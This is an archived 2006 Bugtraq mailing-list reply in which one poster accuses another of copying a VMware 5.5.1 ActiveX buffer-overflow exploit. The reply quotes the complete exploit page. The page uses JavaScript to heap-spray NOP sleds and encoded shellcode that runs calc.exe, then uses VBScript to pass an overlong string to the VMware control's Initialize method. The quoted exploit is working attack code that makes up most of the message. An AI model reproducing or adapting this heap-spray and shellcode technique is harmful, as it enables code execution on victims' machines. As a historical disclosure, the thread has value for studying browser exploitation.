Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)

To: "NormandiaN_MailID@xxxxxxxxx" <NormandiaN_MailID@xxxxxxxxx>
Subject: Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Mon, 27 Nov 2006 13:35:53 -0600
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=sAfaLh93Zzf2tFsH4N+Mv0O6tSRzWjkfu3hdDoSYdpLEtOm90ud5glHjG8q9JweBFOH79sE9BevgX2+YEQG3NlMbtk+uSCXiCUMoDHtzmkkxeZNmAJ9x/s28DHT7Y4G7E1ULM4i022GyKx3cxlITr8nQbJanfPWtvv4B0pzu4zw=
In-reply-to: <20061126060534.19271.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20061126060534.19271.qmail@xxxxxxxxxxxxxxxxx>
Sender: milw0rm@xxxxxxxxx

NormandiaN the code theif,

c0ntex discovered this and released it August 18th 2006, which you
pretty much stole everything line for line.  Nice job.

http://www.milw0rm.com/exploits/2264

/str0ke

On 26 Nov 2006 06:05:34 -0000, NormandiaN_MailID@xxxxxxxxx
<NormandiaN_MailID@xxxxxxxxx> wrote:

<html>
<head>
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
</head>
<body>
<center>
<br>
Discovered By NormandiaN<br>
Visit my website at http://www.grisapka.org<br>
<br>
<h3>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
</h3>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefor I fill half a HUGE  buffer with the address<br>
(pointer) to my evil buffer, which them trampolines me to shellcode<br>
<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
<br>
</center>
<script>
var buffa1 = unescape("%uedb0%u0d91")
do {
buffa1 += buffa1;
}
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090")
do {
buffa2 += buffa2;
}
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
</script>
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
</object>
<script language="vbscript">
VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VmdbPoll=200011744
target.Initialize VmdbDb, VmdbPoll
</script>
</body>

References:
- VMware 5.5.1 Local Buffer Overflow (HTML Exploit)
  - From: NormandiaN_MailID

Prev by Date: Re: Re: "Which is more secure? Oracle vs. Microsoft" (is it a fair comparison?)
Next by Date: rPSA-2006-0219-1 info install-info texinfo
Previous by thread: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)
Next by thread: ClickGallery Sql Injection
Index(es):
- Date
- Thread